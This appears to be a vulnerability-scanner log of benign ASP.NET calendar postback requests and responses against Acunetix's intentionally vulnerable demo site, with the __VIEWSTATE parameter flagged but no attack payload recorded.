href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:White" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8136&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAwjhOG9oIZGRkTQdzJ7ezFXYcgIB2FtDFpHmeefU%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKy5KiaBwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOp2w3RcSUJZtPDk9DJc9aq%2BQETX
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:21:32 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAwjhOG9oIZGRkTQdzJ7ezFXYcgIB2FtDFpHmeefU=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKy5KiaBwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDOp2w3RcSUJZtPDk9DJc9aq+QETX" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:White" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1119 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,119 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8124&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAzTvgEdoIZGRkWAZUlcoCMaUIG0LLAX12zzjeZMQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLF2%2F%2BNCwKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIrIALHaTOXTMpez5kIz0fywwuYg
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:49:37 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgBAzTvgEdoIZGRkWAZUlcoCMaUIG0LLAX12zzjeZMQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLF2/+NCwKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDIrIALHaTOXTMpez5kIz0fywwuYg" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" 